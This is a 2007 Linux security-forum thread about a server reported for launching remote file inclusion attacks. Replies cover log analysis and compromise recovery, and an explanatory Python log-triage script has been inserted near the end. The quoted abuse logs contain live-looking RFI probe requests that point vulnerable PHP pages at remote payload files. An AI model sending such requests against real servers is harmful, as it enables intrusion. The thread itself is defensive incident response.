LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Old 07-09-2007, 10:08 PM   #1
rockymaxsource
Member
 
Registered: Feb 2006
Posts: 43

injection attacks


Hey,

Currently, we get some notice from FortressITX Abuse Dept about some one is using our server doing injection attacks against other servers.

Below are some log files they sent to us
$------------------Snap begin---------------------------$
our.server.ip.address - - [09/Jul/2007:00:31:43 +0200] "GET //.comhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7414 "-" "Mozilla/5.0"
our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415 "-" "Mozilla/5.0"
our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET //.brhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7413 "-" "Mozilla/5.0"
$----------------snap end---------------------------------$

Unfortunately, the person who is in charge of server maintaining is
away now and we can not get hold of him. Can any of you give me some
direction on how to track down the security hole and eliminate it
please?

Thanks a lot in advance!

Blessings,
Rocky
 
Old 07-10-2007, 09:39 PM   #2
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 782
Blog Entries: 8

IMO, in order to prove that the attacks are 'injection attacks', they need to provide something more than what you posted. By 'injection attacks', I'm going to assume they're talking about SQL injection (it could be something else, but I'm not seeing it in those logs you provided, and SQL injection involves taking advantage of possible permissions issues on webserver backend devices, which will most likely traverse over port 80).

The logs you provided appear to be normal traffic, that, BTW, is generating 403 errors, meaning the server understood the request but rejected it. That shows that the 'attacks' aren't getting through.

Now, some of the logs don't make sense to me. I also run a webserver that sees public traffic and my logs typically don't look like:

> our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415

They look more like:

74.6.71.88 - - [10/Jul/2007:21:42:26 -0400] "GET /slackware_botlogs/2005-03/slackware.log.03Mar2005 HTTP/1.0" 404 243 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

What's throwing me off is the "//.infohttp://http://" part of the logs you posted. Unless someone (or something, like a script) is actually entering that as part of the URL...maybe the injection part of it is after (but not logged) the "?" of the URL?

Another question is the "our.server.ip.address". Why would their own IP address be showing in their own web server logs? Maybe they're doing something with their server that I typically don't do, but I've never seen my own IP within my logs, unless I'm visiting my own pages from my home internet account.

Last edited by unixfool; 07-10-2007 at 09:45 PM.
 
Old 07-11-2007, 02:23 AM   #3
rockymaxsource
Member
 
Registered: Feb 2006
Posts: 43

Original Poster
Hey unixfool,

Thank you very much for your reply!

I think they are talking about a URL injection attack. Below is their complaint email:
Quote:
IP Address of attacker: our.server.ip.address

Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

Sample log report including date and time stamp:

Request: aggiebsm.org our.server.ip.address - - [04/Jul/2007:20:05:41 -0400] "GET //oneadmin/faqsupport/include.php?path[docroot]=http://yscfortworth.org/calendar/jester/sei/un/figo.txt? HTTP/1.1" 500 542 "-" "libwww-perl/5.805" - "-"

Request: impactstudentmin.com our.server.ip.address - - [04/Jul/2007:20:15:48 -0400] "GET //oneadmin/faqsupport/include.php?path[docroot]=http://yscfortworth.org/calendar/jester/sei/un/figo.txt? HTTP/1.1" 500 550 "-" "libwww-perl/5.805" - "-"

Can you help out please?

Blessings,
Rocky
 
Old 07-12-2007, 04:06 PM   #4
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 782
Blog Entries: 8

So, I'm going to assume that http://yscfortworth.org/calendar/jes.../un/figo...txt is your website.

You've got issues, because, if that's your site, I tried to traverse the directory (upward) and got as far as http://yscfortworth.org/calendar before I was redirected to a site indicating that your site was compromised. Your site has basically been tagged. I suggest you conduct an investigation of how you may have been attacked. This is important, because you want to learn from this so that your site won't be compromised again soon after you wipe out and reinstall your system. I suggest NOT repairing your existing install, as you may miss something crucial, leaving open a backdoor (there could be more than one).

Suggested reading (recommended by unSpawn at http://www.linuxquestions.org/questi...ad.php?t=45261):

Code:
Compromise, breach of security, detection
Intruder Detection Checklist (CERT): http://www.cert.org/tech_tips/intrud...checklist.html
Detecting and Removing Malicious Code (SF): http://www.securityfocus.com/infocus/1610
Steps for Recovering from a UNIX or NT System Compromise: http://www.cert.org/tech_tips/root_compromise.html
Formatting and Reinstalling after a Security Incident (SF): http://www.securityfocus.com/infocus/1692
How to Report Internet-Related Crime (usdoj.gov CCIPS): http://www.usdoj.gov/criminal/cybercrime/reporting.htm
Related, old(er) articles/docs:
Intruder Discovery/Tracking and Compromise Analysis: http://staff.washington.edu/dittrich...khat/blackhat/
Intrusion Detection Primer: http://www.linuxsecurity.com/feature...e_story-8.html
Through the Looking Glass: Finding Evidence of Your Cracker (LG): http://www.linuxgazette.com/issue36/kuethe.html
Recognizing and Recovering from Rootkit Attacks: http://www.cs.wright.edu/people/facu...on/obrien.html
See also post #5 under Forensics docs
EDIT - I rendered the .txt file URL unusable by changing figo.txt to figo...txt. It bothered me that the link was exposed.

Last edited by unixfool; 07-13-2007 at 07:40 AM.
 
Old 07-13-2007, 01:21 AM   #5
rockymaxsource
Member
 
Registered: Feb 2006
Posts: 43

Original Poster
No, http://yscfortworth.org/calendar/jester/sei/un/figo.txt is not our website. It is hosted on another server.

The only thing related to our server in the log file I posted before is our.server.ip.address; all the other parts have nothing to do with our server.

Can any of you help me please?

Blessings,
Rocky
 
Old 07-13-2007, 01:50 AM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

In addition to what's been said already: please post, say, 20 or 30 consecutive lines that include the offending ones from the log between BB code tags, like this:
Code:
tac logfile | head -30 | sed "s|10.20.30.40|x.x.x.x|g" > outfile
Replace the "10.20.30.40" with the IP address of the server, don't scrub anything else and please don't use weird line breaks.
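The complaint email in post #3 and the scrubbing step unSpawn describes above both come down to reading Apache-style log lines: spotting requests whose query parameter carries a remote URL (the `include.php?path[docroot]=http://...` shape, a remote file inclusion probe) or whose path embeds one (the `//.comhttp://http://...` shape), and masking the server's own IP before pasting lines into a forum. The script below is an added example written for this thread, not code from any poster or from LinuxQuestions.org. The log lines it carries are constructed to mirror the shapes in the thread (with made-up hosts), the server IP `10.20.30.40` is the same placeholder unSpawn's sed command uses, and the "remote URL in a parameter" heuristic is my own choice of indicator, not something the abuse report defines.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines (not real traffic) mirroring the two log shapes
# in the thread: a URL jammed into the path, and a URL passed as a query
# parameter value. 10.20.30.40 stands in for "our.server.ip.address".
SAMPLE_LOG = """\
10.20.30.40 - - [09/Jul/2007:00:31:43 +0200] "GET //.comhttp://http://remote.example/check.jpg? HTTP/1.0" 403 7414 "-" "Mozilla/5.0"
Request: victim.example 10.20.30.40 - - [04/Jul/2007:20:05:41 -0400] "GET //oneadmin/faqsupport/include.php?path[docroot]=http://remote.example/figo.txt? HTTP/1.1" 500 542 "-" "libwww-perl/5.805" - "-"
203.0.113.7 - - [10/Jul/2007:21:42:26 -0400] "GET /slackware_botlogs/2005-03/slackware.log.03Mar2005 HTTP/1.0" 404 243 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp)"
203.0.113.9 - - [10/Jul/2007:21:50:00 -0400] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Apache combined log format, with an optional "Request: <vhost> " prefix
# as seen in the abuse report. No end anchor, so trailing fields are tolerated.
LOG_RE = re.compile(
    r'^(?:Request: \S+ )?'
    r'(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A parameter value that is itself an absolute URL is the classic RFI marker.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def rfi_indicators(target):
    """List the reasons a request target looks like a remote-file-inclusion probe."""
    reasons = []
    # Split by hand rather than with urlsplit: targets starting with "//"
    # would otherwise be parsed as scheme-relative URLs with a bogus netloc.
    path, _, query = target.partition("?")
    for key, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            reasons.append(f"parameter {key!r} points at remote URL {value!r}")
    if "http://" in path.lower() or "https://" in path.lower():
        reasons.append("remote URL embedded in the request path")
    return reasons


def scrub(line, server_ip):
    """Mask the server's own address, like the sed step, and nothing else."""
    return line.replace(server_ip, "x.x.x.x")


def triage(log_text, server_ip):
    """Parse every line, keep the RFI-looking ones, and scrub them for posting.

    The status code says whether the *target* accepted the request (403/500
    here mean it did not); it says nothing about whether the *source* host
    that sent it is clean, which is the question this thread is about.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = rfi_indicators(rec["target"])
        if reasons:
            findings.append({
                "client": scrub(rec["client"], server_ip),
                "time": rec["time"],
                "status": rec["status"],
                "agent": rec["agent"],
                "reasons": reasons,
                "line": scrub(line, server_ip),
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG, "10.20.30.40"):
        print(f["time"], f["status"], f["agent"], "|", "; ".join(f["reasons"]))
        print("   ", f["line"])
```

Run against a real access log, `triage` returns only the suspicious lines with the server IP already masked, which is the form unSpawn asks for; the `client` field tells you whether the requests originate from your own host (as in the abuse report, where the victim's server logged "our.server.ip.address" as the client) or from someone else hitting you.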
All times are GMT -5. The time now is 09:33 AM.